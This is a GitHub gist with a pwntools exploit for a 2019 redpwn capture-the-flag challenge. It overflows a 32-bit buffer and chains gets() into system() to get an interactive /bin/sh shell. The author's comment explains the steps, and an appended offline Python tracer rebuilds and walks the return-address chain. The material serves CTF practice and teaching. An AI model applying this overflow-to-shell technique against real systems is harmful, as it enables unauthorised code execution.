@swt02026
Last active August 19, 2019 09:52
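from pwn import *

r = remote('chall2.2019.redpwn.net', 4002)
gets = 0x080483b0    # address used to call gets()
system = 0x0804b010  # address used to call system()
buf = 0x0804a000     # writable address that receives the command string
# Stack after the overflow: 26 filler bytes, one 32-bit word (0x0804a100),
# then the return address -> gets, gets' return address -> system,
# gets' argument (buf, also system's return slot), system's argument (buf).
payload = b'a'*26 + p32(0x0804a100) + p32(gets) + p32(system) + p32(buf) + p32(buf)
r.sendlineafter(b'challenge', payload)
# gets(buf) now waits on stdin: type /bin/sh, which system(buf) then runs.
r.interactive()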

ghost commented Aug 19, 2019

hey mate
could you please explain how it works?)

Author

swt02026 commented Aug 19, 2019

Sorry, I forgot to comment.
It will open stdin by gets, then you type '/bin/sh' into 0x0804a000 manually.
It will then call system(0x0804a000).
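
The call sequence described in the reply above, traced offline as an added example (not part of the gist or its comments): it rebuilds the same payload with `struct` and walks the overwritten stack using the 32-bit cdecl layout, assuming the return address sits 30 bytes into the input as the payload implies. `build_payload` and `trace_chain` are hypothetical helper names.

```python
import struct

# Addresses copied from the gist; the names are the gist's own variable names.
SYMBOLS = {0x080483b0: "gets", 0x0804b010: "system"}
BUF = 0x0804a000
OFFSET = 30  # assumption from the payload: 26 filler bytes + one 32-bit word


def build_payload():
    """Rebuild the gist's payload with struct instead of pwntools' p32()."""
    words = (0x0804a100, 0x080483b0, 0x0804b010, BUF, BUF)
    return b"a" * 26 + b"".join(struct.pack("<I", w) for w in words)


def trace_chain(payload, stdin_line):
    """Walk the overwritten stack as 32-bit cdecl would, without running anything.

    On entry to a function, [esp] holds its return address and [esp+4] its
    first argument, so consecutive calls overlap by one stack slot.
    """
    tail = payload[OFFSET:]
    tail = tail[: len(tail) // 4 * 4]          # whole 32-bit words only
    stack = [w for (w,) in struct.iter_unpack("<I", tail)]
    memory = {}                                # simulated memory: address -> bytes
    calls = []
    i = 0
    while i + 2 < len(stack) and stack[i] in SYMBOLS:
        name, ret_to, arg = SYMBOLS[stack[i]], stack[i + 1], stack[i + 2]
        if name == "gets":
            memory[arg] = stdin_line           # gets() stores the next input line at arg
            calls.append((name, arg, ret_to))
        else:
            # Record the string this call would read from its argument address.
            calls.append((name, memory.get(arg), ret_to))
        i += 1                                 # the callee's `ret` pops the next slot
    return calls


if __name__ == "__main__":
    # Constructed stdin line matching the one named in the reply above.
    for name, arg, ret_to in trace_chain(build_payload(), b"/bin/sh"):
        shown = hex(arg) if isinstance(arg, int) else repr(arg)
        print(f"{name}({shown}) -> returns to {ret_to:#010x}")
```

The trace shows why the second line typed on stdin matters: `system` receives whatever `gets` stored at `0x0804a000`, and its own return slot is the word that served as the argument to `gets`.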
